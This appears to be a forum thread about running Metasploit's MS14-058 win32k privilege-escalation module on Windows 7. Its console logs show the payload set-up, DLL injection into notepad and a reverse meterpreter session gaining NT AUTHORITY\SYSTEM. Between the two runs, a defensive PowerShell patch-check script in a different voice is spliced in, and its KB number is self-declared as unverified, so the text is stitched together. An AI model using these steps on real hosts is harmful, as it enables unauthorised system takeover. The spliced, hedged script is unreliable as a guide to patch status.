30 Dec

Windows privilege escalation exploit

Hi, I'm having trouble with exploit/windows/local/ms14_058_track_popup_menu.

Here is some info:

meterpreter > sysinfo
Computer        : WORKSTATION1
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Meterpreter     : x64/win64
meterpreter > getuid
Server username: CONTOSO\allenbrewer
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect.

msf > use exploit/windows/local/ms14_058_track_popup_menu
msf exploit(ms14_058_track_popup_menu) > set LHOST 192.168.1.100
LHOST => 192.168.1.100
msf exploit(ms14_058_track_popup_menu) > set DisablePayloadHandler true
DisablePayloadHandler => true
msf exploit(ms14_058_track_popup_menu) > set LPORT 28746
LPORT => 28746
msf exploit(ms14_058_track_popup_menu) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(ms14_058_track_popup_menu) > set TARGET 1
TARGET => 1
msf exploit(ms14_058_track_popup_menu) > set SESSION 3
SESSION => 3
msf exploit(ms14_058_track_popup_menu) > set ExitOnSession false
ExitOnSession => false
msf exploit(ms14_058_track_popup_menu) > exploit -j
[*] Exploit running as background job.
[*] Launching notepad to host the exploit...
[+] Process 2268 launched.
[*] Reflectively injecting the exploit DLL into 2268...
[*] Injecting exploit into 2268...
[*] Exploit injected. Injecting payload into 2268...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.

[nothing (no shell) comes back]

The win32k.sys product version on the target machine is 6.1.7601.17514.

"[*] win32k.sys file version: 6.1.7601.17514 branch: 17"
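A patch-state check that belongs beside a report like the one above, added here as an example and not part of the thread or of the Metasploit module: it prints the win32k.sys file version the module keys on and asks Windows whether the MS14-058 security update is installed, so an administrator can confirm a Windows 7 host is fixed rather than inferring it from whether an exploit attempt returned a shell. The KB identifier is my assumption (KB3000061 is, to my knowledge, the Windows 7 update that ships the MS14-058 win32k.sys fix); verify it against the bulletin before relying on the result, and run the script with administrator rights on the host being checked.

```powershell
# Added example (not from the thread): report win32k.sys version and whether the
# MS14-058 kernel-mode driver fix is present on this Windows 7 host.
# Assumption: $KbId names the MS14-058 update for Windows 7; override it if your
# reference (the MS14-058 bulletin) lists a different KB for this OS/SP.
param(
    [string]$KbId = 'KB3000061'
)

# Path of the kernel-mode driver the module inspects; the thread shows 6.1.7601.17514.
$driver = Join-Path $env:SystemRoot 'System32\win32k.sys'
$ver    = (Get-Item $driver).VersionInfo.FileVersion
Write-Output "win32k.sys file version: $ver"

# Get-HotFix reads Win32_QuickFixEngineering; SilentlyContinue turns "not found"
# into $null instead of a terminating error so the script can report it.
$fix = Get-HotFix -Id $KbId -ErrorAction SilentlyContinue

if ($fix) {
    Write-Output "$KbId is installed (InstalledOn: $($fix.InstalledOn)); MS14-058 fix present."
} else {
    Write-Warning "$KbId not found; this host appears unpatched for MS14-058. Check Windows Update."
}
```

Run it as `.\Check-MS14058.ps1` (or `.\Check-MS14058.ps1 -KbId KBnnnnnnn` to substitute the identifier you have confirmed). The driver version line is informational only: whether the host is fixed is decided by the presence of the update, not by matching a version string by hand.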


Now we can get SYSTEM privilege, Thanks.

Host Name: NFS-001
OS Name: Microsoft Windows 7 Home Premium
OS Version: 6.1.7601 Service Pack 1 Build 7601

msf > use exploit/windows/local/ms14_058_track_popup_menu 
msf exploit(ms14_058_track_popup_menu) > sessions -l

Active sessions
===============

  Id  Type                   Information            Connection
  --  ----                   -----------            ----------
  1   meterpreter x86/win32  nfs-001\nfs @ NFS-001  192.168.108.113:4444 -> 192.168.108.197:2735 (192.168.108.197)

msf exploit(ms14_058_track_popup_menu) > set SESSION 1
SESSION => 1
msf exploit(ms14_058_track_popup_menu) > run

[*] Started reverse handler on 192.168.108.113:4444 
[*] Launching notepad to host the exploit...
[+] Process 2732 launched.
[*] Reflectively injecting the exploit DLL into 2732...
[*] Injecting exploit into 2732...
[*] Exploit injected. Injecting payload into 2732...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (770048 bytes) to 192.168.108.197
[*] Meterpreter session 2 opened (192.168.108.113:4444 -> 192.168.108.197:2787) at 2015-02-10 07:46:21 +0000

meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM
